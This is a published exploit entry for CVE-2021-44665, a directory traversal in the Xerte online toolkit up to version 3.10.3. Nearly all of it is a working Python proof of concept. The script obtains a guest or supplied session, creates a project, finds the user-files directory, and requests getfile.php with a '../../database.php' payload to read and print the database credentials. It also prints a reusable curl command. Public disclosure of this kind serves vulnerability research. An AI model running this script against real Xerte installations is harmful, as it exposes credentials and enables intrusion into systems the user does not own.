
Xerte 3.10.3 Directory Traversal

2022-03-02 00:00:00
Rik Lutz
packetstormsecurity.com
`# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)  
# Date: 05/03/2021  
# Exploit Author: Rik Lutz  
# Vendor Homepage: https://xerte.org.uk  
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip  
# Version: up until 3.10.3  
# Tested on: Windows 10 XAMP  
# CVE : CVE-2021-44665  
  
# This PoC assumes guest login is enabled (otherwise supply a valid PHPSESSID below). Vulnerable URL:
# https://<host>/getfile.php?file=<user-directory>/../../database.php
# getfile.php joins the supplied path onto the user's USER-FILES directory without normalising it,
# so "../" segments walk out of that directory; database.php (the DB credentials) is just one example target.
# You can find a user-files directory by creating a project and browsing the media menu:
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The user-files directory is shown in the URL and/or when you download a file.
# They look like: <numbers>-<username>-<templatename>
# Note that the PoC leaves the created project ("exploit") behind on the target; there is no cleanup step.
  
import requests  
import re  
  
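xerte_base_url = "http://127.0.0.1"
file_to_grab = "/../../database.php"  # traversal payload appended to the USER-FILES directory
php_session_id = ""  # If guest is not enabled, and you have a session ID. Put it here.

# Per-request timeout (seconds) so the PoC cannot hang forever on a host that
# accepts the connection but never answers.
REQUEST_TIMEOUT = 15

# Template/project names sent to new_template.php. The project is visible to
# the target's users/admins and is never deleted by this script.
TEMPLATE_NAME = "Nottingham"
PROJECT_NAME = "exploit"

# Response parsers. Raw strings: "\d" in a plain literal is an invalid escape
# sequence warning on newer interpreters.
TEMPLATE_ID_RE = re.compile(r"(\d+)")
USER_DIR_RE = re.compile(r"USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)")


def extract_template_id(response_text: str) -> str:
    """Return the first run of digits in the new_template.php response.

    Raises:
        RuntimeError: no digits found. In practice this means the request was
            not authenticated (guest login disabled, or a stale PHPSESSID),
            which the original ``findall(...)[0]`` reported as a bare IndexError.
    """
    match = TEMPLATE_ID_RE.search(response_text)
    if match is None:
        raise RuntimeError(
            "no template ID in new_template.php response - is guest login "
            "enabled, or is the supplied PHPSESSID still valid?"
        )
    return match.group(1)


def extract_user_directory(response_text: str) -> str:
    """Return the USER-FILES directory name from media_and_quota_template.php.

    The directory looks like ``<numbers>-<username>-<templatename>``.
    NOTE(review): the username class is lower-case alphanumerics only, as in
    the original PoC; widen it if your account name contains other characters.

    Raises:
        RuntimeError: no USER-FILES path present in the response.
    """
    match = USER_DIR_RE.search(response_text)
    if match is None:
        raise RuntimeError(
            "no USER-FILES directory in media_and_quota_template.php response"
        )
    return match.group(1)


def build_traversal_url(base_url: str, user_directory: str, target_file: str) -> str:
    """Return the getfile.php URL that reads *target_file* relative to *user_directory*.

    *target_file* is appended verbatim, so it must start with the traversal
    (e.g. ``/../../database.php``); nothing is URL-encoded, matching the
    request shape the original PoC sends.
    """
    return f"{base_url}/getfile.php?file={user_directory}{target_file}"


def main(
    base_url: str = xerte_base_url,
    target_file: str = file_to_grab,
    session_id: str = php_session_id,
) -> str:
    """Run the PoC against *base_url* and return the body served by getfile.php.

    Steps: obtain a session (guest, or the supplied PHPSESSID), create a
    project so the server allocates a USER-FILES directory, look that
    directory up via the media-and-quota page, then request *target_file*
    through getfile.php. The fetched content and the variables needed to
    reproduce the request with curl are printed.

    Raises:
        RuntimeError: the server did not return a template ID or a
            USER-FILES directory (typically an authentication problem).
        requests.RequestException: network failure or timeout.
    """
    with requests.Session() as session:
        if session_id:
            session.cookies.set("PHPSESSID", session_id)
        else:
            # Guest mode: the landing page hands out a PHPSESSID cookie.
            session.get(base_url, timeout=REQUEST_TIMEOUT)

        # Creating a project is what makes the server create the per-user
        # directory that anchors the traversal.
        new_template = session.post(
            base_url + "/website_code/php/templates/new_template.php",
            data={
                "tutorialid": TEMPLATE_NAME,
                "templatename": TEMPLATE_NAME,
                "tutorialname": PROJECT_NAME,
                "folder_id": "",
            },
            timeout=REQUEST_TIMEOUT,
        )
        template_id = extract_template_id(new_template.text)

        properties = session.post(
            base_url + "/website_code/php/properties/media_and_quota_template.php",
            data={"template_id": template_id},
            timeout=REQUEST_TIMEOUT,
        )
        user_directory = extract_user_directory(properties.text)

        traversal_url = build_traversal_url(base_url, user_directory, target_file)
        result = session.get(traversal_url, timeout=REQUEST_TIMEOUT)

        # database.php contains the application's DB credentials: treat the
        # output (and any log capturing it) as sensitive.
        print(result.text)
        print("|-- Used Variables: --|")
        # .get() rather than [] so a missing cookie does not mask the result
        # that was already printed above.
        sessid = session.cookies.get_dict().get("PHPSESSID", "")
        print("PHP Session ID: " + sessid)
        print("user directory: " + user_directory)
        print("HTTP status: " + str(result.status_code))
        print("Curl example:")
        print('curl --cookie "PHPSESSID=' + sessid + '" ' + traversal_url)
        return result.text


if __name__ == "__main__":
    main()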
  
  
`